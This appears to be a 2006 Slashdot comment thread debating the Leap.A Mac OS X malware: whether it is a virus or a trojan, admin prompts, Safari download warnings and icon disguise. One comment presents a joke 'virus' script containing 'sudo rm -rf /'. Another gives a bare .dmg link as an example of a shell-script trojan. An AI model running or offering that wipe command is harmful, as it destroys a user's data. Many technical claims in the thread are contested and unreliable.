What are you talking about? Admin accounts normally get password popups to do anything like this (system updates, system-wide installers, etc.). Are you saying in this specific instance it doesn't?

Re:FUD of the day

[Arandir]

Mac admin accounts are not like Windows admin accounts. They are not root accounts. You still have to sudo to do any root-level administration.

Re:FUD of the day

[javaxman]

What are you talking about? Admin accounts normally get password popups to do anything like this (system updates, system-wide installers, etc.). Are you saying in this specific instance it doesn't?

Well, actually, that's on a time-related basis ( if you've authenticated recently it won't always ask again ), I think, and some of the forum posts I saw seemed to indicate that for whatever reason, this doesn't trigger that on Admin accounts, I think because it only writes to /Applications, not /System or anything without Admin-write privilege set. Sometimes the authentication you're talking about is triggered by the installation process, too, not the system, so.... yea, running as Admin, not a good idea.

I'm not sure, of course. Still waiting for further information.

Re:FUD of the day

[TheNumberless]

That's why the first thing I do on a new OS X system is to set timestamps_timeout to 0 in sudoers. It eliminates this grace period, requiring a password prompt for every Admin action. With this change, I think running as Admin can be pretty safe.

I could be overlooking some other security flaws, though...

Re:FUD of the day

[Onan]

When you run it, an admin password prompt is displayed by OS X, and you have to enter it to continue.

...Unless you are running an admin account. Then it just runs.

Uh, no. Really no.

The effect of an admin account is one level more strict than this. Any user, when attempting to install a package or modify system directories, will be prompted for authentication, and only an admin account's name and password can be used to approve the request. Both types of accounts will be asked, the difference is that a non-admin account can't say yes.

Re:FUD of the day

[99BottlesOfBeerInMyF]

Both types of accounts will be asked, the difference is that a non-admin account can't say yes.

Have you actually tried this? All three resources I've looked at, each written by security people doing write-ups have disagreed with you. It only touches the applications and Library directories, both of which are writable by an admin account without a password. Try writing a file if you don't believe me.

From the initial Ambrosia write up: "It requires the admin password if you're not running as an admin user." I think you are misreading the analysis. Non-admin users require an admin password to write to the shared Applications directory, which this virus does. This is separate from admin users needing to type their password when they want to use superuser privileges like adding a kernel module, driver, or the like.

Re:FUD of the day

[javaxman]

That's why the first thing I do on a new OS X system is to set timestamps_timeout to 0 in sudoers. It eliminates this grace period, requiring a password prompt for every Admin action. With this change, I think running as Admin can be pretty safe.

Remember, I'm not sure about that part. I think what could be going on is that the app only writes into /Applications and /Library, which are writable by Admin, but not to /System or any other locations that aren't admin-writable... thus, it doesn't trigger the authentication dialog for the admin user not matter what, it's only triggered if you aren't in the admin group.

Of course, every user everywhere is always at risk always from a trojan that wipes out all of their writeable files. There's not much that can be practically done to prevent that, outside of user training.

Re:FUD of the day

no crontab in OS X

Re:FUD of the day

[njyoder]

Other browsers warn too, though not for compressed files, but that means this isn't an OS X virus or trojan but a user-run program.

Wrong. DO NOT SPEAK IF YOU DON'T KNOW WHAT THE TERMS 'VIRUS' AND 'TROJAN' MEAN. My comment here refutes all of these ridiculous allegations. Most windows worms/viruses require the user to initially run it. That doesn't change the fact that it tries to infect applications (virus) and spread itself via the internet (worm).

A program written "inside of the user's space" as you put it wouldn't have much to do and wouldn't propagate

Aside from spread! It has full internet access, moron. It can reek havoc on all of your work (which is stored with user privileges). PLUS, because this is a wetware flaw, it obivously works on ignorance of usrs, thus requiring the user to do a routine aciton of entering a password is meaningless. They'll type in the password just like u sers blindly click through windows. Of course, it's not even necessary.

Re:FUD of the day

[Starxxon]

If I'm not mistaken it warns you that it "might be" an application, as it does with all archives in .zip, .gtz, or .dmg format. Also, not everyone uses Safari.

Safari will try to identify every file found in an archive. It can scan through a number of formats, including .dmg, .zip and .gz, to look for executables. If no executable is found and all files are identified as safe, the archive is decompressed and there is no warning. If an executable is found, and that include .exe files, a warning will say "This file contains an application."

Safari will also raise a flag if it cannot be sure everything contained in the file are safe files. This happens when it encounters a file it cannot decompress and scan itself, like in the discussed example, where a .tar file is contained inside a .gz file. Safari checks inside the .gz file, and since it cannot be sure of what's inside the .tar, it gives the warning: "This file might contain an application", with the option to cancel.

So you are right, this is what happen in this case.

But...

Other browsers will throw "might contain programs or bad things" dialogs for just about everything you try to download. Inexperienced users will see the message, and might decide to stop downloading files from fear of viruses. But those who decide to download files anyway will face up this dialog each time, to a point where clicking OK becomes automatic, and the original message loses its meaning.

On Safari, the warning only appears when an application is downloaded, or when the archive contains some compressed file in a seldom used format like .tar. So the most inexperienced users will rarely get a warning when downloading files, except when downloading an application.

That makes it a learning process to the user. They will learn that only applications or files containing obscure files like .tar trigger the warning, and that a .zip folder full of text, images or movies don't. In that case, most Safari users will find abnormal that this supposed gziped folder that is supposed to contain photos instead contains a .tar and triggers a warning.

I'm not saying that it's 100 percent idiot proof. But it's certainly better than the "every file on the internet can be bad" simplistic approach taken by other browsers.

Re:FUD of the day

[Sky99]

Well, as if the explorer stuff kept people from clicking dumbly on any single thing downloaded from nowhere? How would you keep them from clicking on something bad, exept by having an antivirii soft scanning the incomping files? Then the power user would disable it and scan by himself when got a doubt about the file... Still, on OS-X system, one could expect it to warn when some dangerous actions are being made by software, like deleting massive amount of files... That would add another "confirm" box, but might help...

It doesn't have to be an app

It can work as a shell script too.
For example:
http://srmail.net/cool.dmg

Re:It's not a virus... eet's ahhh... eeet's ahhh

[davidsyes]

TriRus or a VoJan...

Well, then, if the user is careless enough to provide the admin password for one of these "concept gone wild" pieces of code, then at SOME point is no longer is the case of:

"The executable never actually crashes any part of the OS to gain control of the OS and do something that the user doesn't authorize."

It probably won't need to 'crash' the os, but it'll have free reign to run, or worse, free run to reign OVER your system (hmm, think I just coined a cool phrase...).

Who cares that it "doesn't authorize" before hand? Isn't the worm/virus/trojan going to get access?

I think one way to deal with this is to make the OS provide the user or admin the option to "chunkify" the task so that an operation that is wide in scope and deep in penetration has to "hit up against" an execution firewall. Meaning: intense processes could be made to be "stopped" or "interrupted" to help contain SOME of the damage. A process could be divided into, say, 10ths, and the user hast to SIT there. Most of us are sitting there, anyway. If it's a short process, then clicking yes 10 times to some rogue or new app could be disguised by making the OS show some OS-useful/informative admin/user-needed material. If it's a LONG process, then most likely this will slow down the admins and FORCE them to THINK about what they're going to be implementing.

Just some ideas. Don't know if parallels already exist. So, not claiming anything new or novel, except my "free reign to run/free run to reign"

First Time Run Dialog

[jscotta44]

I have not installed brand new, never before run software on my Mac lately - too busy trying to get my work done. But I seem to recall that the very first time an application is run, a dialog pops open and asks you if you want to run it. Is that correct, or am I imaging things?

Re:First Time Run Dialog

That only happens if an application would be run for the first time indirectly--basically, by being set to the default to open a particular file type and then having someone try to open that type of file.

Re:First Time Run Dialog

[CableModemSniper]

You are indeed correct.

Re:First Time Run Dialog

[Starxxon]

It doesn't display the dialog for a unix script...That's the problem with this one.

Re:First Time Run Dialog

[CableModemSniper]

A unix script can't be wrapped up in a app bundle to hide its icon. Well it can, but as soon as it does, it becomes an application and follows the same rule. Furthermore, unix scripts aren't double-clickable unless they have a .command extension. I take that back, the command extension only lets it run in terminal. But once you change the extension to command it gets a "command" icon. Regardless, to make it a double-clickable bundle with an arbitrary icon, it becomes an app by definition and you get the warning.

Re:MOD PARENT UP - IT IS A VIRUS

[bprime]

you would see from your own quoted definitions that this is not a virus.

lol no its not a virus

LOL

WELL PLAYED, SIR!

Stupidity at it's best

[nexcomlink]

I don't see how this can be called a virus. The last time I remember a virus uses some type of exploit either with a system process or 3rd party application which is granted administration privilages without the user knowning. If this so called virus comes up asking with a password to me it's nothing more than a simple little script made by an amature. You can do this with Applescript as well. Last time I checked a trojan does not replicate itself. A virus does but this is by far not a virus more like a pitiful excuse for one at least.

not the same

"Once the media gets a hold of a blanket term, we're stuck with it. Yes, it's technically a trojan. But nowadays malware that's not adware gets lumped into the virus category. Take a look at the term "hacker." "Cracker" would be the preferred term for a bad hacker, but the media still uses "hacker.""

Hacker has always been the correct term since the 80's. Only recently have people unsuccessfully tried to make up a new word, and change the meaning. Msiusing the word virus is a different matter, but this thing self-propogates so it's more than just a trojan

Useless Distinction

[nuckfuts]

To all the purists out there who can't resist piping up with "It's not a virus - it's a trojan":

It's a useless distinction to say that trojans are not viruses because they require user intervention.

Would you go around saying that gonorrhoea is not a true disease because you have to do something voluntarily to get it?

Trojans are a CLASS of virus.

Re:Useless Distinction

[nuckfuts]

To all the jackasses out there who can't resist modding any negative comment as flamebait:

Think about what flamebait actually means. It is a deliberate attempt to piss someone off and start a flame war. The parent is making simple statement - that going around repeating "a trojan is not a virus" may be technically correct but adds no valuable insight to the discussion. This statement is hardly an incitement to argue. Nobody would conceivably feel strongly enough about it to respond.

Re:Phew! an Anonymous PRESCIENT Coward..

[davidsyes]

Apple: Apple to 'Switch' to Windows?

http://apple.slashdot.org/article.pl?sid=06/02/16/ 1826257

WOW!

Mac notebooks might actually be cheaper.

[Jesus_666]

The hardware isn't _that_ much better than what you can buy in the Windows world.

Depending on the market you're looking at it's not that much better but that much cheaper/easier. Try finding a decent entry-level notebook guaranteed to run a unixoid OS. You have the Thinkpad, but IBM/Lenovo charges even more for the name tag than Apple does. Then you have... various laptops that might or might not work (and usually won't completely). And you have the iBook, a notebook known for it's robustness and for an OS actually worth paying a premium for, which also happens to weigh less than the usual notebook. And come with a usable 3D card. Not to mention the decent price. And the fact that you can choose the size of your mainboard/RAM/etc. when buying from Apple's online store. With no shipping costs. And did I mention the fact that students get a price cut?

If you want a cheap notebook that runs something besides Windows Apple makes a _very_ good offer. I hope that the iBook stays the same with the switch to Intel (cheap, light and silent with decent battery life that is).

My tinfoil hat says this was written by...

[javaxman]

a Symantec or McAffee employee. Anyone want to place bets ? ;-)
I'm pretty sure I'm kidding...

My OSX virus (cross-platform actually)

[Lulu+of+the+Lotus-Ea]

#!/bin/bash
sudo rm -rf /

A really nasty one too. Naturally, you'll need to enter your admin password to operate it... but that's the rule for Mac viruses, after all.

All OSes are Deficient!

[Burz]

Where Mac OS, Windows and all the rest fail is that they don't enforce strong visual cues for executables.

I have said this before: Superimpose all representations of executables with a red circle or red border, and these trojans will become an endangered species!

Stop confusing data and code in the minds of users!

More of a Trojan than a Virus

[qazwart]

This is more social engineering rather than finding a security hole:

* Claims to be a file of interest. Usually picture of a hot nekkid girl. This is for Mac Geeks, so it's a picture of a hot screen shot of the next OS.

* Pasted a copy of the JPEG icon onto the app. Could happen in any OS.

* You'll be asked for the SysAdmin password in order to "view" this JPEG. Some users may get suspicious about that, others will blindly type it in.

* Again, shows that hiding extensions is not a good idea. If extensions are shown, the .app extension would let everyone know this is an app and not a picture.

=======

This is a problem much in the same light like the email phishing scams. I'd like to see a mask applied to executable icons, so that looking at an icon will let you know if its a program or not -- even if the developer attempts to make you think the file is benign by pasting over another icon on top of it. The mask will let you know it's really an executable.

The other is user education. Users should know that viewing a JPEG shouldn't require the System Administrator's password.

Is everything a "virus" now?

[jonadab]

> The resultant file decompresses into what appears to be a standard JPEG icon in
> Mac OS X but was actually a compiled Unix executable in disguise.

Sounds like a Trojan to me. Does it attach itself to other executables? How would it do that on OS X, without admin privs? Trojans for Unix are of course possible and have been around since, to a first approximation, the beginning of time (i.e., 1970). What makes this news? Is this one spreading quite a bit, or something?

Yes, I CAN say "I told you so".

[argent]

The user first has to request that the file be downloaded, then Safari will ask if the user would like to open it, then the app is decompressed and launched, then the Finder alerts them that this is a new app being run and asks for verification to do so, then the app asks for the user's password, then the app is executed.

Aha, so the people saying it's not a dialog box are being misleading.

It's two dialog boxes.

It doesn't matter if it was three dialog boxes, it's the same reflex action. In fact in more recent versions of Internet Explorer you do get multiple dialog boxes that have to be OKed for some files, and people do repeatedly check yes. Because 99.9% of the time "yes" is the normal response, and an unexpected "yes" is no different.

How would it be better if Safari just dumped the downloaded file into the user's download directory so they had to go double-click it from there to start the same sequence of events?

Fewer would get caught once. Almost none would get caught twice. This is what I've observed with hundreds of users over the ... 8 years now since Microsoft introduced this kind of misbehaviour with Active Desktop.

It doesn't matter how many levels of "OK" are involved. Clicking on a link is routine, clicking the "OK" that comes up after many links are clicked on is routine. Having any kind of break in the pattern between downloading and explicitly opening a jpg file instead of having it just show up in the browser? That's an exception.

It makes a real difference

Re:Yes, I CAN say "I told you so".

On Windows, I agree - that behavior is a problem. The problem, however, isn't with just having to click "OK", it's with Windows forcing the user to do that so often just to get regular work done that it becomes a habit to do so without looking at what you're OK-ing. We're not talking about Windows here. We're talking about OS X.

OS X doesn't tend to get in your way in the normal course of operations so most Mac users actually take a look at what they're doing when a dialog box is displayed. Some don't, that's true, but from my 15+ years of experience with all types of users on many many different platforms, the difference between how many will get burned the first time with both download-then-open and Safari-prompts-to-open and those who'd catch it with download-then-open behavior is very small. The question then becomes "How much time are we going to waste for the vast majority of people to save a very small minority from their own stupidity?" That question is also skewed drasticly towards the Wasting Most People's Time camp given the number of chances to this point where that behavior would really cause a problem (that number now being 1, and arguably still 0 since this thing hardly has any distribution in the wild). If you're Microsoft, your answer is "Push as much work off to the user as possible." If you're Apple, your answer is "Allow most people to get their work done without unnecessary interference while still providing an adequate level of security for the minority that needs it." I'm quite happy with the Apple answer. My suggestion to you would be to stop using Windows and break away from the downward spiral of Microsoft-Mentality and see how much better your computing life becomes. :)

You're wrong.

[LKM]

I'd call this a virus to be clear about its functionality.

Viruses need to a) spread by themselves and b) infect applications. Worms only need to spread. Trojans need to do neither, they're simply apps disguising as something else.

The application in question is a Trojan and possibly a Worm (depending on whether the spreading actually works). Certainly not a virus.

Re:You're wrong.

[99BottlesOfBeerInMyF]

Viruses need to a) spread by themselves and b) infect applications... The application in question is a Trojan and possibly a Worm

The malware in question does infect applications, changing several parameters and attempting to cause itself to be loaded when they are run (although a bug prevents this from working). It also attempts to spread itself automatically via file sharing and the bon jour auto discovery protocol.

Orphan child

[Dr.+Cody]

Actually, this is just Apple's way of making up to a long lost son. You see, many years ago, Apple and Windows 3.1 got drunk at a party and one thing lead to another...

Nine months later, the bastard child of Windows 3.1 was born to much acclaim--with a red-faced DOS wondering why on earth is own child looked so little like him. Well, it's been a few years, and that son's faithful parents have both passed away. After several years drifting between orphanages and foster homes, Apple opened the local paper to find a picture of the bastard son he had nearly forgotten.

This adoption is Apples way of righting what went wrong and maybe, just maybe, giving this poor child a future full of hope and promise.

It's not the first...

[gralem]

In April, 2004, CNN reported on the exact same type of trojan that used an MP3 file extension.

Also, there is no confirmation that this screenshot propogates itself, and it definately does NOT self-execute.

No Big Deal.

Apple mice and usability misconceptions

[name_already_taken]

and mac users know that "right-click" is synonomous with "control-click". it's the same thing. in fact, isn't it silly that Windows users don't have the option to do that? (or, i don't know, maybe they do.)

Well, here's the thing - there are no one-button mice for Windows PCs, so there's no need to hold down a modifier key. Having two button mice right out of the box is far more convenient than control-clicking any day.

I've used every version of Windows, and the first Mac I used was a 128k back in the 1980s. When I got a G4 Powerbook I was frustrated by the lack of a right-click button - OS X is clearly designed in such a way that the machine needs to have one for more than the most casual use. Right clicking makes any number of common tasks faster and easier (copying and pasting for example, both of which can be done by right clicking in OS X as well as Windows)

I recently got a Powermac G5 quad and was glad to see the Apple Mighty Mouse in the box, however Apple's first attempt at a mouse that lets you right-click doesn't quite do it - it's as though it was designed by someone who never heard of right-clicking before; in order to right-click you have to remove all of your other fingers from the mouse which just doesn't make sense from a usability standpoint. The side squeeze buttons are great though, and I love the scroll ball. I'm hoping they come out with a software update that will fix the right-clicking.

Re:Apple mice and usability misconceptions

[Myopic]

if you were sitting in a roomfull of random computer components, you might assemble a Windows box but the only mouse available is the USB mouse that came with an old iMac. or, as a Windows user, you might decide you prefer a one-button mouse and purchase one from a third party (there are lots available). it's untenable to claim there are "no" one-button mice for Windows, because that is tantamount to claiming there are no one-button mice at all. a USB mouse can plug into any computer. so if you plug in said one-button mouse to a Windows machine -- say it's your only option -- then why won't Windows provide a way for you to right-click? seems shortsighted to me. that was my point: a Mac can do it both ways.

i've never tried to right click with the mighty mouse, but i did try the scroll ball, and didn't think it was very intuitive, but i only gave it a minute of trying. it was really slow, and it would inevitably scroll horizontally when i only wanted to scroll vertically.

Admin accounts modify /Applications with no popups

[javaxman]

Just to be clear for the uninformed mods who think my +1 comment was overrated and your comment ( sorry ) is not... emphatically and once again I say that the Admin account in this case does *not* get the kind of popup you're talking about, because this trojan doesn't write to things owned by the "system" group that the admin group can't write to... it only writes to /Applications and /Library, things that the admin group has write permissions to, but that normal users can't.

If you are running as an admin-level user, there are things that a trojan like this will wipe have access to ( i.e. everything in your Applications folder ) that would be protected if you were running as a regular, non-admin-group user.

Reading the article, or better yet, the Ambrosia Software write-up of the worm, will give you a clear idea of how an admin-group use is more susceptable to this attack than other users.

one more thing

[name_already_taken]

I forgot my second, and more important point - who routinely uses "Get info" on files before opening them? I don't know anyone.

That's clearly not a solution.

But I thought Trojans were...

[MacDork]

I thought Trojans(TM) were designed to prevent infection and replication... oh, this is Slashdot... nevermind! ;-)

--
"We need an expert in computers"

Here is the real important news for /. crowd

[Ilgaz]

Thanks to Mark Allan and various other people Clam database now has information about this "whatever you call it" crap.

ClamXAv , a Cocoa GUI for opensource Clam engine which makes it accessible to majority of OS X users can detect it:
http://www.clamxav.com/

It is free (donation) ware.

I think it also means that the users of ISPs/Corparate Networks using Clam engine to detect viruses won't get it via mail attachment too.

First virus?

[4D6963]

First Mac OS X virus?? I thought the first one was the honor system virus.

Oh wait, what? Nobody ported the honor system virus to Mac OS X?

Not a virus?

[njyoder]

I can't believe they updated to say it wasn't one. A virus is just a program that infects other files with itself. A worm is a program that spreads itself using internt connections directly. This program does both of those. Just because it requires the user to run it, doesn't mean it isn't one.

I'm sick of people who don't know what these terms mean flashing them around. It's a trojan if it doesn't try to spread itself, this does.

Most windows viruses/worms require the user to execute it manually. In fact, that's 99% of DOS viruses, are you saying most past viruses are just trojans? How do you think those spread? Someone inserts a disk with an infected program, runs it and it injects itself into other programs on the computer. Those other programs are then spread MANUALLY by the user not knowing that they're infected.

REQUIRING IT TO BE MANUALLY RUN INITIALLY doesn't make it just a trojan.

McAfee and Sophos have both classified this as a worm/virus. STOP BEING MORONS. It's funny that even the people who read the analysis still managed to talk out of their ass about this and deem it just a trojan.

You're right.

[LKM]

The malware in question does infect applications, changing several parameters and attempting to cause itself to be loaded when they are run (although a bug prevents this from working).

Interestingly enough, you're right. From Ambrosia: It then copies the application executable to its own resource fork, and replaces the application executable with the OSX/Oomp-A trojan

That doesn't work eventually, but it actually does try to infect other applications.

Re:Time to get into the habit of read-only filesys

[reed]

I meant to keep the files at mode 555, or on a read-only filesystem. Then, to modify the file, you would need to either chmod them or remount it first, which could be made to loudly notify the user that someone is trying to screw with some improtant system files.

Obviously some people would still click OK, but, maybe less.

Just an idea.

Administrator dialog

[Danathar]

I wish apple would change the pop-up that asks for your administrator password so that the box IS BRIGHT RED, and says something like "A program is asking for SUPER user priviledges on your computer. DO NOT click YES unless you initiated this action and understand it's consequences"

Make the default NO and that would scare just about any grandma or newbie computer user into protection.

Re:Time to get into the habit of read-only filesys

[argent]

1. This wouldn't provide ANY more protection than what Mac OS X does already.
2. This is easily bypassed by storing the malware under $HOME.

Re:It's not a virus... bzzt. Wrong Fanboi!

[5plicer]

No, Leap.A does not "[replicate] itself into other executable code or documents". According to http://www.f-secure.com/v-descs/leap_a.shtml,

Leap.A installs a bundle to '~/InputManagers/apphook' that hooks certain iChat functions. When any of the user's buddies change their status, the worm initiates a file transfer and sends a copy of ' 'latestpics.tgz'. The file transfer is not visible to the user as the worm hides the transfer status information.

The worm enumerates all applications on the computer that were used during the last month. Leap.A replaces the main executable of those applications with itself and saves the original file to a resource fork with the same filename. When the application is opened the worm activates first, then it runs the original application from the resource fork.

stop it

stop trying to tell us that a trojan is different from a virus. they are the same thing! Spyware adware trojans and viruses all the same thing they all do something bad! so dont be nit picky about terms you mother fuchers

THAT DIDN'T TAKE LONG

[argent]

Safari will not automatically open things anyway, and will ask you before decompressing anything with an executable in it.

Oh, Really?

Yes I can bloody well say "I told you so".

Re:THAT DIDN'T TAKE LONG

[goMac2500]

Right. This is where you need to go learn what an executable is.

Re:THAT DIDN'T TAKE LONG

[argent]

A UNIX shell script is an executable. That's how the execute bit in UNIX works. That's how the shell (not Terminal.app) knows to execute a file.

(don't teach your grandfather to suck eggs - I've been writing software for UNIX since 1979, and I was a developer for what became Mac OS X before it was FreeBSD)

Wow, it took a whole FOUR DAYS...

[argent]

Any way, in this particular case auto-running content is not exploited anyway.

But it is in this one.

Wow, it took a whole four days before the next "Open safe files" exploit.

HELLO, APPLE, CAN YOU GET THE HINT THIS TIME?